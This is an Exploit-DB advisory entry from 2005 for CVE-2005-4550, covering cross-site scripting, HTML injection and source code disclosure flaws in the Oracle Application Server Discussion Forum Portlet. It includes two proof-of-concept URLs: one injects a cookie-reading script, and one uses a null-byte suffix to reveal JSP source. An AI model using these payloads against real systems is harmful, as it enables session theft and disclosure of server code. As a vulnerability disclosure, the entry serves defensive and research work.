oracle application server discussion forum portlet Multiple Vulnerabilities

2005-12-23T00:00:00
ID EDB-ID:26972
Type exploitdb
Reporter Johannes Greil
Modified 2005-12-23T00:00:00

Description

Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities. CVE-2005-4550. Webapps exploit for jsp platform

                                        
                                            source: http://www.securityfocus.com/bid/16048/info

Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities.

The following specific vulnerabilities were identified:

The application is prone to a cross-site scripting vulnerability.

Discussion Forum Portlet is also affected by multiple HTML injection vulnerabilities.

The application is vulnerable to a source code disclosure vulnerability as well.

All versions of Oracle Application Server Discussion Forum Portlet are considered to be vulnerable. It should be noted that Oracle Application Server Discussion Forum Portlet is not meant to be used in a production environment. 

Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>

Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00